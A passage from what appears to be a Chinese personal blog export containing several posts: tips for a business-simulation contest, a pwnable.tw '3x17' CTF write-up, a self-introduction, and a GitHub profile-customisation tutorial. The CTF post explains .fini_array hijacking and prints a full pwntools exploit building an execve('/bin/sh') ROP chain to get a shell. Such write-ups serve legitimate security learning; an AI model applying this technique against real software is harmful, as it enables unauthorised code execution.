<h3 id="主场作战，有惊无险"><a href="#主场作战，有惊无险" class="headerlink" title="主场作战，有惊无险"></a>主场作战，有惊无险</h3><p>第十二届上海市大学生工程实践与创新能力大赛由我们学校承办，也就是说我们这次是在主场作战。不巧的是比赛时疫情管控刚刚放开，许多参赛选手都阳了或者回家了，导致有几组队伍退赛了，包括我们学校校内赛在另一组夺冠的队伍。因此我们成了该赛项的主场独苗，压力突然就增大了。我们队伍也只来了3个人，阳了一个。但和“百团大战”那次不同，这次我们研究了国奖选手的打法、深入剖析了规则、熟练掌握了Excel的制作与使用、制定了详细的策略，当然最重要的是我们参加了多次训练赛。可能因为是市级赛事大家比较保守，场上近二十支队伍采取了同样的策略，不存在总体策略的优劣，想要获胜就全靠比赛过程中的临场反应了。比赛中期开始有队伍制定低价破坏市场平衡，我们及时作出反应调低价格才避免了破产。在第5季时我们的季度排名已经进入前5，并且势头大好。不过之前说的社牛朋友紧张了，填错产品价格，导致我们在某个市场的销量和占有率暴跌，优势一去不复返，季度排名掉出前10。我们再次做出及时的调整，制定更低的产品价格，采用“薄利多销”的方案，最终在比赛结束前挽大厦于将倾，挤进了特等奖的行列。BTW，貌似其他特等奖队伍基本都有来自于商学院的选手。</p>
<h2 id="我获得了什么？"><a href="#我获得了什么？" class="headerlink" title="我获得了什么？"></a>我获得了什么？</h2><ol>
<li><p>团队协作能力<br>这是我觉得最重要的一点。其实这支队伍里我最开始也就认识那一个人，但是大家的目标是一致的，因此不存在有人摆烂的情况——这是团队协作的基础。这项比赛对于参赛的大多数队伍来说，都需要考虑分工，如何让合适的人做合适的工作，这是一门学问。如何组织大家训练、如何在比赛过程中形成统一的意见、如何有效地沟通……这些都是十分重要的技能。</p>
</li>
<li><p>处理困境的能力<br>赛事官网这样写道：</p>
<blockquote>
<p>通过竞赛，推进虚拟仿真实验教学在创新创业教育中的落地应用。参赛队员在模拟经营实践中，培养其创新精神，创业能力，提升学生在复杂条件下如何做出科学决策的能力，学会如何在困境中生存发展的企业家精神，形成如何建立团队、组织团队实现目标的能力。通过竞赛，全面提高学生发现问题、解决问题、综合分析问题能力；锻炼学生沟通协作、交流应变能力；对学生逻辑思维、开拓创新等综合能力都有一定的锻炼和提升。</p>
</blockquote>
<p>或许我以后当不了企业家，但是在困境中生存发展永远是人生的必修课之一。况且未来谁人可知，万一将来某日我所学到的企业运营本领真派上用场了呢？</p>
</li>
</ol>
<p>当然，还有些我没获得但其他人可能获得的。比如在很多学校，该赛事拿国奖是有保研加分的。</p>
<h2 id="如何上手？"><a href="#如何上手？" class="headerlink" title="如何上手？"></a>如何上手？</h2><ol>
<li><p>阅读比赛规则<br>前往<a href="http://www.qyyyfz.com/index.jsp">官网</a>熟悉比赛规则</p>
</li>
<li><p>观看B站视频<br>Up🐖推荐：</p>
<ul>
<li><a href="https://space.bilibili.com/368153901">O流砂O</a>（入门）</li>
<li><a href="https://space.bilibili.com/476554695">冰桓</a>（制表）</li>
<li><a href="https://space.bilibili.com/526514075">科韵工作室</a>（进阶）</li>
</ul>
</li>
<li><p>网上找比赛群进行训练<br>网上搜索EOVS训练赛QQ群，有些群经常会有比赛，可以先用别人的表格（我的表格放在文章最后）</p>
</li>
<li><p>练习制表</p>
<p>下图是我自己制作的表格</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/01/11/63beacf2cef5d.png" data-fancybox="default" data-caption="自制表格"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/01/11/63beacf2cef5d.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/01/11/63beacf2cef5d.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="自制表格"></a><span class="image-caption">自制表格</span></div></div>
<p>比赛中有非常多的数据要计算，如果自己用计算器算非常耗时而且正确率难以保证。一般来说，省级及以上的比赛都是要求不能使用现成表格的，也就是说如果想用表格就必须在现场制作。如果不是熟练掌握Excel公式及赛事规则的话，短时间内很难现场制作出这样一张表格，因此平时需要加以练习（制表是我的任务之一，所以我深有体会)。</p>
</li>
</ol>
<h2 id="一些经验"><a href="#一些经验" class="headerlink" title="一些经验"></a>一些经验</h2><p>B站和知乎有很多国奖大佬，可以去看他们的视频和文章或礼貌讨教。我的水平远不及他们，我的一些经验也是从大佬们那里学来的，仅供参考。</p>
<ol>
<li>制表时未必要完全按照规则给的公式敲，有一些简化的公式<ul>
<li>人工费用=计划生产量*1.4</li>
<li>生产设备价值=运营状况表下季实际产能*10</li>
<li>生产线折旧=上一季生产设备价值*10%</li>
</ul>
</li>
<li>单季买原材料，双季还款<br>单数季度购买两季度的原材料，几乎是约定俗成的规矩。根据供需关系，如果你在双数季度购买原材料，价格会更高。<br>由于单数季度购买原材料，所以没有足够的现金还款，双数季度可以根据实际资产负债比、利息等考虑还款。</li>
<li>前期所有者权益越接近150w的整数倍越好<br>所有者权益每增加150w可以让你有资格多购买1条生产线，假如你在2，3季度时生产线就比别人少2，3条，那么利滚利滚利，差距会越来越大，所以需要计算下季度理论上能达到的所有者权益。但是并不是所有者权益比预期高得越多越好，例如下一季度想要购买3条生产线，则需要有450w权益，将决策输入表格后发现达到520w，那么可以将这多余的70w花一部分在研发、营销等地方，这样收益才能最大化。因此，最理想情况是前期每次比要卡到的所有者权益高出几万到十几万。</li>
<li>注意3市场队伍<br>3市场队伍会放弃一个市场，对于4市场打法的选手来说，3市场选手放弃的这个市场就是最好的突破口，在这个市场能够用更低的营销卖出去更多、更贵的产品。</li>
<li>第5季度高营销<br>因为根据市场发展规律，第6季度市场往往会缩水。但此时又是购买生产线最多的季度，产量暴增，要想将产品卖光，必须提前用营销打开市场，提高市场占有率，才能分得更大的蛋糕。第5季度的决策可以很大程度上决定这场比赛的走向。</li>
<li>平衡营销和研发投入<br>根据赛事介绍，营销和研发都存在边际递减效应。尽管研发的优势在当季度很难体现出来，但是到了比赛后期，如果品牌好、质量差，投入高营销的效果会很差，后期比拼的就是前中期的积累。一味地投入营销可能会让你在前中期占尽优势，但后期质量差导致的市场占有率降低会让你损失非常多净利润。</li>
<li>先练好8+2，四十场打法<br>我们在所有正式比赛里都采用8+2，四市场打法，因为这种打法最为稳妥但又不失机遇。当有了一定的场数积累后再去尝试其他激进的打法，如7+3，8+3以及三市场打法。</li>
</ol>
<h2 id="EOVS表格及笔记仓库"><a href="#EOVS表格及笔记仓库" class="headerlink" title="EOVS表格及笔记仓库"></a>EOVS表格及笔记仓库</h2><div class="tag link"><a class="link-card" title="EOVS-excel-note" href="https://github.com/BeaCox/EOVS-excel-note"><div class="left"><img src="https://github.githubassets.com/favicons/favicon.svg" class="lazyload" data-srcset="https://github.githubassets.com/favicons/favicon.svg" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></div><div class="right"><p class="text">EOVS-excel-note</p><p class="url">https://github.com/BeaCox/EOVS-excel-note</p></div></a></div>
]]></content>
      <categories>
        <category>生活</category>
      </categories>
      <tags>
        <tag>竞赛</tag>
      </tags>
  </entry>
  <entry>
    <title>从 pwnable.tw——3x17 学习 .fini_array</title>
    <url>/posts/fini_array/</url>
    <content><![CDATA[<p>尽管 <a href="https://pwnable.tw/challenge/">pwnable.tw</a>已经很久没更新新题，这上面的题目放到现在<del>对我而言</del>也仍然是很有趣的。在解 3x17 这道题的时候，用到了之前从没用过的 <strong>fini_array hijack</strong>，因此记录一下。</p>
<h2 id="预分析"><a href="#预分析" class="headerlink" title="预分析"></a>预分析</h2><p><code>checksec</code> 结果：</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">Arch:     amd64-64-little</span><br><span class="line">RELRO:    Partial RELRO</span><br><span class="line">Stack:    No canary found</span><br><span class="line">NX:       NX enabled</span><br><span class="line">PIE:      No PIE (0x400000)</span><br></pre></td></tr></tbody></table></figure>

<p><code>file</code> 结果：</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">3x17: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, <span class="keyword">for</span> GNU/Linux 3.2.0, BuildID[sha1]=a9f43736cc372b3d1682efa57f19a4d5c70e41d3, stripped</span><br></pre></td></tr></tbody></table></figure>

<ul>
<li>PIE 未启用：不用泄露程序基地址</li>
<li>canary 未启用：如果有栈溢出可以直接利用</li>
<li>静态链接：没有 libc</li>
</ul>
<h2 id="程序功能分析"><a href="#程序功能分析" class="headerlink" title="程序功能分析"></a>程序功能分析</h2><figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> ( byte_4B9330 == <span class="number">1</span> )</span><br><span class="line">{</span><br><span class="line">  write_func(<span class="number">1u</span>, <span class="string">"addr:"</span>, <span class="number">5uLL</span>);</span><br><span class="line">  read_func(<span class="number">0</span>, buf, <span class="number">0x18</span>uLL);</span><br><span class="line">  v4 = (<span class="type">char</span> *)(<span class="type">int</span>)bytes_to_addr(buf);</span><br><span class="line">  write_func(<span class="number">1u</span>, <span class="string">"data:"</span>, <span class="number">5uLL</span>);</span><br><span class="line">  read_func(<span class="number">0</span>, v4, <span class="number">0x18</span>uLL);</span><br><span class="line">  result = <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>
<p>程序很直接地提供了一次任意地址写的机会，又称 <strong>Write What Where (WWW)</strong> 。不过我们没有栈空间地址泄露，因此暂时无法直接利用栈来直接控制代码流。</p>
<p>GOT 表劫持？没有 <code>system</code> 函数。但是 <code>Partial RELRO</code> 可不仅仅意味着可以利用 GOT 表劫持，也意味着可以使用 <strong>fini_array 劫持</strong>。</p>
<h2 id="fini-array"><a href="#fini-array" class="headerlink" title=".fini_array"></a><code>.fini_array</code></h2><p><code>.fini_array</code> 是什么？简单来说，它是一个函数指针数组，一旦程序退出就会运行其中的函数，不过是按倒序方式，例如先运行 <code>.fini_array[1]</code> 再运行 <code>.fini_array[0]</code> 。只要我们能覆写该数组中的函数指针，我们就能劫持代码流。</p>
<h3 id="无限循环"><a href="#无限循环" class="headerlink" title="无限循环"></a>无限循环</h3><p>很多时候题目（例如这题）中的漏洞指利用一次是不够我们 capture the flag 的，因此我们需要达到漏洞的重复利用。以这题为例，我们可以构造：<code>.fini_array[0] == __libc_csu_fini &amp;&amp;.fini_array[1] == main</code></p>
<ol>
<li>当程序退出时，先执行 <code>main</code> 函数，任意写包含于其中（尽管会检查<code>0x4B9330</code>地址处是否为1，但其类型为 byte/uint8，因此<code>1+16 == 1</code>，我们不必担心）。</li>
<li>然后执行 <code>__libc_csu_fini</code> 函数。该函数的作用就是调用所有 <code>.fini_array</code> 中的函数，于是回到步骤1。因此形成了无限循环。</li>
</ol>
<h3 id="如何定位-fini-array和-libc-csu-fini-的地址？"><a href="#如何定位-fini-array和-libc-csu-fini-的地址？" class="headerlink" title="如何定位.fini_array和__libc_csu_fini 的地址？"></a>如何定位<code>.fini_array</code>和<code>__libc_csu_fini</code> 的地址？</h3><figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">readelf -S ./3x17 | grep .fini_array</span><br></pre></td></tr></tbody></table></figure>

<p><code>-S</code> 可以显示各个段的 header 。</p>
<p>在 <code>start</code> 函数中找到：</p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line">sub_401EB0(</span><br><span class="line">  (<span class="type">unsigned</span> <span class="type">int</span>)main,</span><br><span class="line">  v4,</span><br><span class="line">  (<span class="type">unsigned</span> <span class="type">int</span>)&amp;retaddr,</span><br><span class="line">  (<span class="type">unsigned</span> <span class="type">int</span>)sub_4028D0,</span><br><span class="line">  (<span class="type">unsigned</span> <span class="type">int</span>)sub_402960,</span><br><span class="line">  a3,</span><br><span class="line">  (__int64)&amp;v5);</span><br><span class="line">__halt();</span><br></pre></td></tr></tbody></table></figure>

<pre><code># in the `start`, there is a `_libc_start_main`
# the `_libc_start_main`'s 4th and 5th arg is `_libc_csu_init`, `_libc_csu_fini`
</code></pre>
<p>根据经验<code>sub_401EB0</code>为<code>__libc_start_main</code>，而<code>__libc_start_main</code> 的第 4 和第 5 个参数分别是 <code>__libc_csu_init</code> 和 <code>__libc_csu_fini</code>。</p>
<h2 id="ROP"><a href="#ROP" class="headerlink" title="ROP"></a>ROP</h2><p>我们现在拥有了无限次任意地址写的机会，也知道如何利用 <code>.fini_array</code> 来劫持代码流，接下来做什么？</p>
<p>首先，静态链接的 ELF 最不缺的就是 gadgets。我们很容易找到 pop 各种寄存器以及 <code>syscall</code> 的 gadgets。很容易构造 ROP chain 。那么离 get shell 就只差——栈。</p>
<p>我们需要将 ROP chain 放到栈上去。<code>__libc_csu_fini</code> 函数为我们创造了条件：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">push    rbp</span><br><span class="line">lea     rax, unk_4B4100</span><br><span class="line">lea     rbp, off_4B40F0</span><br><span class="line">push    rbx</span><br><span class="line">...</span><br></pre></td></tr></tbody></table></figure>

<p>以上是 <code>__libc_csu_fini</code> 函数的开头，其中<code>lea rbp, off_4B40F0</code>中的<code>0x4B40F0</code>就是 <code>.fini_array</code> 的起始地址。换言之，在运行完 <code>__libc_csu_fini</code> 函数后，<code>rbp</code> 的值为 <code>.fini_array</code> 的起始地址。接下来只要利用 <code>leave ; ret</code> 就可以让返回地址为 <code>fini_array + 0x8</code>。因为 <code>leave == mov rsp, rbp ; pop rbp</code>。</p>
<ol>
<li><code>mov rsp, rbp</code> : <code>rsp = rbp = .fini_array</code></li>
<li><code>pop rbp</code> : <code>rbp = .fini_array[0]</code>, <code>rsp = .fini_array + 0x8</code>   </li>
<li><code>ret</code> : <code>rip = rsp = .fini_array + 0x8</code></li>
</ol>
<p>因此只要令<code>.fini_array[0]</code> 处为<code>leave ; ret</code> gadget 的地址，且从<code>.fini_array + 0x8</code> 开始为 ROP chain 即可 get shell 。</p>
<h2 id="exploit"><a href="#exploit" class="headerlink" title="exploit"></a>exploit</h2><p>由于只是一道 150 分的题，根据 pwnable.tw 的规则可以公开代码用于参考：</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">exe = ELF(<span class="string">"./3x17"</span>)</span><br><span class="line"></span><br><span class="line">context.binary = exe</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">conn</span>():</span><br><span class="line">    <span class="keyword">if</span> args.LOCAL:</span><br><span class="line">        r = process([exe.path])</span><br><span class="line">        <span class="keyword">if</span> args.DEBUG:</span><br><span class="line">            gdb.attach(r)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        r = remote(<span class="string">"chall.pwnable.tw"</span>, <span class="number">10105</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> r</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">www</span>(<span class="params">r,addr,data</span>):</span><br><span class="line">    r.sendafter(<span class="string">b"addr:"</span>,<span class="built_in">str</span>(addr).encode())</span><br><span class="line">    r.sendafter(<span class="string">b"data:"</span>,data)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line">    args.LOCAL = <span class="literal">False</span></span><br><span class="line">    r = conn()</span><br><span class="line">    <span class="comment"># `readelf -S ./3x17` to find the addr of .fini_array</span></span><br><span class="line">    <span class="comment"># in the `start`, there is a `__libc_start_main`</span></span><br><span class="line">    <span class="comment"># the `__libc_start_main`'s 4th and 5th arg is `__libc_csu_init`, `__libc_csu_fini`</span></span><br><span class="line"></span><br><span class="line">    fini_array = <span class="number">0x4b40f0</span></span><br><span class="line">    libc_csu_fini = <span class="number">0x402960</span></span><br><span class="line">    main = <span class="number">0x401b6d</span></span><br><span class="line">    leave_ret_addr = <span class="number">0x401c4b</span></span><br><span class="line">    pop_rdi = <span class="number">0x401696</span></span><br><span class="line">    pop_rsi = <span class="number">0x406c30</span></span><br><span class="line">    pop_rdx = <span class="number">0x446e35</span></span><br><span class="line">    pop_rax = <span class="number">0x41e4af</span></span><br><span class="line">    syscall = <span class="number">0x4022b4</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># stage1: eternal loop</span></span><br><span class="line">    www(r,fini_array,flat(libc_csu_fini,main))</span><br><span class="line"></span><br><span class="line">    <span class="comment"># stage2: rop chain</span></span><br><span class="line">    www(r, fini_array + <span class="number">0x10</span>, flat(fini_array+<span class="number">0x50</span>, pop_rsi, <span class="number">0</span>))</span><br><span class="line">    www(r, fini_array + <span class="number">0x28</span>, flat(pop_rdx, <span class="number">0</span>, pop_rax))</span><br><span class="line">    www(r, fini_array + <span class="number">0x40</span>, flat(<span class="number">0x3b</span>, syscall) + <span class="string">b'/bin/sh\x00'</span>)</span><br><span class="line">    www(r, fini_array, flat(leave_ret_addr, pop_rdi))</span><br><span class="line"></span><br><span class="line">    r.interactive()</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></tbody></table></figure>

]]></content>
      <categories>
        <category>CTF</category>
      </categories>
      <tags>
        <tag>PWN</tag>
        <tag>ROP</tag>
        <tag>.fini_array</tag>
      </tags>
  </entry>
  <entry>
    <title>初来乍到，请多指教！</title>
    <url>/posts/firstblog/</url>
    <content><![CDATA[<h1 id="我是谁？"><a href="#我是谁？" class="headerlink" title="我是谁？"></a>我是谁？</h1><span id="more"></span>

<center>我是一名普通大学生、极客爱好者。</center>

<center>是NBA和F1的狂热粉丝。</center>

<center>白日梦是成为一名优秀的（白帽）hacker。</center>

<center>我将在这个网页上更新我的学习经历、生活等。</center>

<center>请多多指教！</center>

<h1 id="为什么搭建这样一个博客？"><a href="#为什么搭建这样一个博客？" class="headerlink" title="为什么搭建这样一个博客？"></a>为什么搭建这样一个博客？</h1><ul>
<li><p>其实最直接的原因是最近在<a href="https://www.w3school.com.cn/">w3school</a>学html+css，又偶然间在油管上刷到了利用<a href="https://hexo.io/">hexo</a>和<a href="https://github.com/">github</a>搭建个人博客的视频，脑子一热，就花了一段时间搭建了这个网站。</p>
</li>
<li><p>还有一个原因就是为了<del>装杯</del>，毕竟听说学IT的人总归要有个个人博客。<del>技术不行那就先拿博客凑个数</del></p>
</li>
<li><p>然后呢就是为了有一个渠道去分享我的一些学习经验和生活吧。更新随缘。</p>
</li>
</ul>
<h1 id="如何联系我"><a href="#如何联系我" class="headerlink" title="如何联系我"></a>如何联系我</h1><ul>
<li><p><a href="mailto:root@beacox.space">邮箱</a></p>
</li>
<li><p><a href="https://github.com/BeaCox">Github主页</a></p>
</li>
</ul>
<p>欢迎所有访客的友好交流和建议哦！</p>
]]></content>
      <tags>
        <tag>杂七杂八</tag>
      </tags>
  </entry>
  <entry>
    <title>GitHub个人资料页美化</title>
    <url>/posts/githubBeautify/</url>
    <content><![CDATA[<p>本文介绍如何美化GitHub个人资料页</p>
<span id="more"></span>

<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2>
<style type="text/css">
.heimu { color: #000; background-color: #000; }
.heimu:hover { color: #fff; }
</style>

<p><strong>GitHub</strong>  <span class="heimu">GayHub</span>相信大家应该是常逛啊。有的时候我们会看到，有些用户的主页比较与众不同。比如说这位<a href="https://github.com/rzashakeri">老哥</a>：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e752ebad47.png" data-fancybox="one" data-caption="rzashakeri"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e752ebad47.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e752ebad47.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="rzashakeri"></a><span class="image-caption">rzashakeri</span></div></div>

<p>我看到这个的第一想法就是：哎哟不错哦，俺也整一个玩玩儿！毕竟GitHub的界面还是比较单调的，这样的资料页可以说是<strong>简约中不失格调</strong>。So，开整！</p>
<h2 id="创建仓库"><a href="#创建仓库" class="headerlink" title="创建仓库"></a>创建仓库</h2><p>新建一个仓库和你的用户名一致的仓库，勾选Public和Add a README file。</p>
<h2 id="自动生成资料页"><a href="#自动生成资料页" class="headerlink" title="自动生成资料页"></a>自动生成资料页</h2><p>效果图：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e752d3533d.png" data-fancybox="one" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e752d3533d.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e752d3533d.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>

<p>点击<a href="https://rahuldkjain.github.io/gh-profile-readme-generator/">链接</a>跳转<br>按照提示填写要展示的信息就可以，然后拉到最下面点击Generate README<br>可以先点preview预览一下，有的资源可能会没有<br>然后复制markdown内容到你仓库中的README.md当中去，保存，就可以在你的主页看到效果了</p>
<h2 id="标题图片"><a href="#标题图片" class="headerlink" title="标题图片"></a>标题图片</h2><article class="message is-info"><div class="message-body">
<p>来源：<a href="https://github.com/leviarista/github-profile-header-generator">项目仓库</a></p>
</div></article>

<p>先上效果图：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e752d3343f.png" data-fancybox="one" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e752d3343f.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e752d3343f.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>

<p>食用方法介绍：</p>
<ul>
<li>点击<a href="https://leviarista.github.io/github-profile-header-generator/">链接</a>去生成标题图片（怎么生成就不介绍了，一看就懂）</li>
<li>将下载下来的图片重命名为<code>header.png</code></li>
<li>把这张图片上传到仓库根目录<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e752d32f26.png" data-fancybox="one" data-caption="点击upload files"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e752d32f26.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e752d32f26.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="点击upload files"></a><span class="image-caption">点击upload files</span></div></div>
然后把这张图片上传上去，拉到底部点commit changes</li>
<li>再回到<code>README.md</code>，在第一行写上这段代码<code>&lt;p align="center"&gt;&lt;img src="header.png"&gt;&lt;/p&gt;</code>并保存</li>
</ul>
<h2 id="GitHub信息"><a href="#GitHub信息" class="headerlink" title="GitHub信息"></a>GitHub信息</h2><article class="message is-info"><div class="message-body">
<p>来源：<a href="https://github.com/anuraghazra/github-readme-stats">项目仓库</a></p>
</div></article>

<p>效果图：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e752d33eb0.png" data-fancybox="one" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e752d33eb0.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e752d33eb0.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>

<p>在你需要添加GitHub信息的地方添加以下代码</p>
<figure class="highlight html"><table><tbody><tr><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">p</span> <span class="attr">align</span>=<span class="string">"center"</span>&gt;</span><span class="symbol">&amp;nbsp;</span><span class="tag">&lt;<span class="name">img</span> <span class="attr">align</span>=<span class="string">"center"</span> <span class="attr">src</span>=<span class="string">"https://github-readme-stats.vercel.app/api?username=bowenyoung&amp;show_icons=true&amp;locale=en&amp;theme=blue-green"</span> <span class="attr">alt</span>=<span class="string">"bowenyoung"</span> /&gt;</span><span class="tag">&lt;/<span class="name">p</span>&gt;</span></span><br></pre></td></tr></tbody></table></figure>

<p>其中bowenyoung这个地方要换成你的用户名，当然你也可以查看该项目的<code>README.md</code>更改主题或其他参数</p>
<h2 id="博客最新文章（需要RSS）"><a href="#博客最新文章（需要RSS）" class="headerlink" title="博客最新文章（需要RSS）"></a>博客最新文章（需要RSS）</h2><article class="message is-info"><div class="message-body">
<p>来源：<a href="https://github.com/gautamkrishnar/blog-post-workflow">项目仓库</a></p>
</div></article>

<p>先上效果图：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e752e474aa.png" data-fancybox="one" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e752e474aa.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e752e474aa.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>

<p><a id="way">食用方法介绍：</a></p>
<ul>
<li><p>进入刚刚创建的，和你用户名相同的仓库</p>
</li>
<li><p>在你的README.md中加入<code>&lt;!-- BLOG-POST-LIST:START --&gt;&lt;!-- BLOG-POST-LIST:END --&gt;</code>，这段代码的位置就是之后显示博客最新文章的位置</p>
</li>
<li><p>在你的仓库中添加一个名为<code>.github</code>的文件夹，在这个文件夹下添加一个名为<code>workflows</code>的文件夹，在这个文件夹下再添加一个名为<code>blog-post-workflow.yml</code>的文件。听起来很复杂，只要按照下图操作即可</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e752e31f69.png" data-fancybox="one" data-caption="点击Create new file"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e752e31f69.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e752e31f69.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="点击Create new file"></a><span class="image-caption">点击Create new file</span></div></div>
<p>在这个框里输入<code>.github/workflows/blog-post-workflow.yml</code></p>
</li>
<li><p>在文件里输入以下代码</p>
<figure class="highlight yaml"><table><tbody><tr><td class="code"><pre><span class="line"><span class="attr">name:</span> <span class="string">Latest</span> <span class="string">blog</span> <span class="string">post</span> <span class="string">workflow</span></span><br><span class="line"><span class="attr">on:</span></span><br><span class="line">  <span class="attr">schedule:</span> <span class="comment"># 自动运行workflow</span></span><br><span class="line">    <span class="bullet">-</span> <span class="attr">cron:</span> <span class="string">'0 * * * *'</span> <span class="comment"># 每到整点运行一次</span></span><br><span class="line">  <span class="attr">workflow_dispatch:</span> <span class="comment"># 可以手动在仓库的action中运行workflow</span></span><br><span class="line"></span><br><span class="line"><span class="attr">jobs:</span></span><br><span class="line">  <span class="attr">update-readme-with-blog:</span></span><br><span class="line">    <span class="attr">name:</span> <span class="string">Update</span> <span class="string">this</span> <span class="string">repo's</span> <span class="string">README</span> <span class="string">with</span> <span class="string">latest</span> <span class="string">blog</span> <span class="string">posts</span></span><br><span class="line">    <span class="attr">runs-on:</span> <span class="string">ubuntu-latest</span></span><br><span class="line">    <span class="attr">steps:</span></span><br><span class="line">      <span class="bullet">-</span> <span class="attr">name:</span> <span class="string">Checkout</span></span><br><span class="line">        <span class="attr">uses:</span> <span class="string">actions/checkout@v2</span></span><br><span class="line">      <span class="bullet">-</span> <span class="attr">name:</span> <span class="string">Pull</span> <span class="string">in</span> <span class="string">dev.to</span> <span class="string">posts</span></span><br><span class="line">        <span class="attr">uses:</span> <span class="string">gautamkrishnar/blog-post-workflow@master</span></span><br><span class="line">        <span class="attr">with:</span></span><br><span class="line">          <span class="attr">feed_list:</span> <span class="string">"https://bowenyoung.cf/atom.xml"</span></span><br></pre></td></tr></tbody></table></figure>

<p>注意把<code>feed_list</code>后面的网址改成你的RSS链接。</p>
</li>
</ul>
<p>到这里，所有的配置就完成了。如果想手动运行一下看结果，按照下图方法操作：</p>
